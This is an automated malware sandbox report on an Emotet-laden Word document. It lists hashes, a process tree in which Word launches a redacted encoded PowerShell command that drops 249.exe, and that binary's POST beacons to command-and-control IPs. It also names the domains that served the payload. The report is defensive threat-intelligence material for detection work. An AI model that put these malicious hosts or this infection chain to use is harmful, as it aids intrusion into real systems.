Field | Value |
---|---|
download: | ogx7vtz2tr4j_8g5j473-096029329350379 |
Full analysis: | https://app.any.run/tasks/618daae0-3673-4956-9ad5-76f395ae7652 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a highly destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | October 09, 2019, 19:16:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Australian Dollar, Subject: Rubber, Author: Thalia Romaguera, Keywords: Bedfordshire, Comments: visionary, Template: Normal.dotm, Last Saved By: Nona Tremblay, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 17:49:00 2019, Last Saved Time/Date: Wed Oct 9 17:49:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0 |
MD5: | 9513B1D4CC78349DAD3C20151118EAFF |
SHA1: | 7B63D465E84D2A4961E69C69464B807500C9AEEB |
SHA256: | FD8C3FCF8CA04DDD17F6FB7F7A6463912E6F33BFAF27E765188887FDE52686F0 |
SSDEEP: | 6144:mRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdZZb3tpTkPSP/bd8bijiH8pk4FiLW46di1:mRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdg |
Extension | File type (match score) |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
Manager: | Schroeder |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 205 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Marks - Kassulke |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 176 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:09 16:49:00 |
CreateDate: | 2019:10:09 16:49:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Nona Tremblay |
Template: | Normal.dotm |
Comments: | visionary |
Keywords: | Bedfordshire |
Author: | Thalia Romaguera |
Subject: | Rubber |
Title: | Australian Dollar |
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version |
---|---|---|---|---|---|---|---|---|---|---|
2800 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ogx7vtz2tr4j_8g5j473-096029329350379.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Word | | 14.0.6024.1000 |
3112 | powershell -enco (encoded command removed) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
2488 | "C:\Program Files\Windows Media Player\wmplayer.exe" /prefetch:1 | C:\Program Files\Windows Media Player\wmplayer.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Windows Media Player | 0 | 12.0.7600.16385 (win7_rtm.090713-1255) |
3512 | "C:\Program Files\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files\Windows Media Player\wmplayer.exe" /prefetch:1 | C:\Program Files\Windows Media Player\setup_wm.exe | — | wmplayer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Windows Media Configuration Utility | 0 | 12.0.7600.16385 (win7_rtm.090713-1255) |
3388 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Windows Explorer | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
3796 | "C:\Program Files\WinRAR\WinRAR.exe" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | admin | Alexander Roshal | MEDIUM | WinRAR archiver | 0 | 5.60.0 |
3664 | "C:\Users\admin\249.exe" | C:\Users\admin\249.exe | — | powershell.exe | admin | Monkey Head Software | MEDIUM | Monkey Head Media Stream | 0 | 1, 0, 0, 1 |
2472 | --11c0a8b5 | C:\Users\admin\249.exe | | 249.exe | admin | Monkey Head Software | MEDIUM | Monkey Head Media Stream | 0 | 1, 0, 0, 1 |
2380 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 249.exe | admin | Monkey Head Software | MEDIUM | Monkey Head Media Stream | 0 | 1, 0, 0, 1 |
920 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | | msptermsizes.exe | admin | Monkey Head Software | MEDIUM | Monkey Head Media Stream | | 1, 0, 0, 1 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4E8A.tmp.cvr | — | — | — |
3112 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZGF4BADJWZ403UU38XTF.temp | — | — | — |
2800 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 58362D3A772A98306A3BD83CCCF74366 | 464DECF6DD8B425AAEC8B237EE31236D61E78153935E52CD8026C87DC381FE82 |
1360 | AcroRd32.exe | C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal | — | — | — |
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72766F55.wmf | wmf | AD3E990B1A08FEABF8B973BC06E21B7D | 97E06BE3DB9C67F970CE07CADC3A87CA7D4FA39D42C09DEC6FD6F3404427D36B |
1360 | AcroRd32.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.1360 | — | — | — |
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$x7vtz2tr4j_8g5j473-096029329350379.doc | pgc | 0CC4DB92EFE00875B91A7A646DBB2FEC | 2625B7F506BB4AC43670E6AF584F7325A305DE1CB8DCC0EFEEFF10FEB5F9097E |
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16528F71.wmf | wmf | 39AD55F8B482E33398A3A39349235A33 | 7EA0E7820BB08BB0C3FED87B90E5762FADE38ECFA1B5051317E00C38B5812B13 |
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 89EAD3F2F95C3CD84E7FB7AE27F9B509 | 543B4910F26D36D170D4ABF0E8F90C61D809A667B7D35A636A9082A4E720A03F |
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9614EBE.wmf | wmf | 49C5D718F641C17D725BD20C4DE3C461 | C957EBE630668E014AB6BA4346E6F5368873D72E3280405D61395E926EE6A0F0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3380 | CCleaner.exe | GET | 301 | 151.101.0.64:80 | http://www.piriform.com/auto?a=0&p=cc&v=5.35.6210&l=1033&lk=&mk=IJR6-W5SV-5KYR-QBZD-6BY4-RN5Z-WAV9-RVK2-VJCA&o=6.1W3&au=1&mx=97B7721C4994E2556FF6A439510F665DB45337A341A47E15F4997584423BF714&gu=00000000-0000-4000-8000-d6f7f2be5127 | US | — | — | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/279_15_23_20070.zip | unknown | — | — | whitelisted |
936 | chrome.exe | GET | 204 | 172.217.26.35:80 | http://csi.gstatic.com/csi?v=3&s=gapi_module&action=gapi_iframes__googleapis_cli12&it=mli.27,mei.5&tbsrt=725&tran=15&e=abc_l0,abc_m0,abc_pgapi_iframes__googleapis_cli12,abc_u0&rt= | US | — | — | whitelisted |
936 | chrome.exe | GET | 302 | 172.217.18.174:80 | http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx | US | html | 509 b | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip | unknown | — | — | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip | unknown | — | — | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip | unknown | — | — | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip | unknown | — | — | whitelisted |
920 | msptermsizes.exe | POST | 200 | 198.199.114.69:8080 | http://198.199.114.69:8080/taskbar/vermont/ringin/merge/ | US | binary | 132 b | malicious |
920 | msptermsizes.exe | POST | — | 23.239.29.211:443 | http://23.239.29.211:443/health/free/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1868 | AcroRd32.exe | 2.16.186.97:80 | acroipm2.adobe.com | Akamai International B.V. | — | whitelisted |
3380 | CCleaner.exe | 151.101.0.64:80 | www.piriform.com | Fastly | US | whitelisted |
3112 | powershell.exe | 47.110.40.3:443 | www.zhizaisifang.com | — | CN | unknown |
— | — | 151.101.0.64:443 | www.piriform.com | Fastly | US | whitelisted |
920 | msptermsizes.exe | 198.199.114.69:8080 | — | Digital Ocean, Inc. | US | malicious |
1868 | AcroRd32.exe | 2.21.36.203:443 | armmf.adobe.com | GTT Communications Inc. | FR | suspicious |
3380 | CCleaner.exe | 151.101.2.202:443 | www.ccleaner.com | Fastly | US | suspicious |
3380 | CCleaner.exe | 151.101.0.64:443 | www.piriform.com | Fastly | US | whitelisted |
3112 | powershell.exe | 45.56.100.50:443 | www.soprettyhairllc.com | Linode, LLC | US | unknown |
3112 | powershell.exe | 45.56.100.50:80 | www.soprettyhairllc.com | Linode, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.soprettyhairllc.com | | unknown |
www.zhizaisifang.com | | unknown |
acroipm2.adobe.com | | whitelisted |
armmf.adobe.com | | whitelisted |
www.piriform.com | | whitelisted |
www.ccleaner.com | | whitelisted |
ardownload2.adobe.com | | whitelisted |
clientservices.googleapis.com | | whitelisted |
accounts.google.com | | shared |
www.google.com.ua | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
920 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
920 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
920 | msptermsizes.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
920 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
Process | Message |
---|---|
vlc.exe | core libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface. |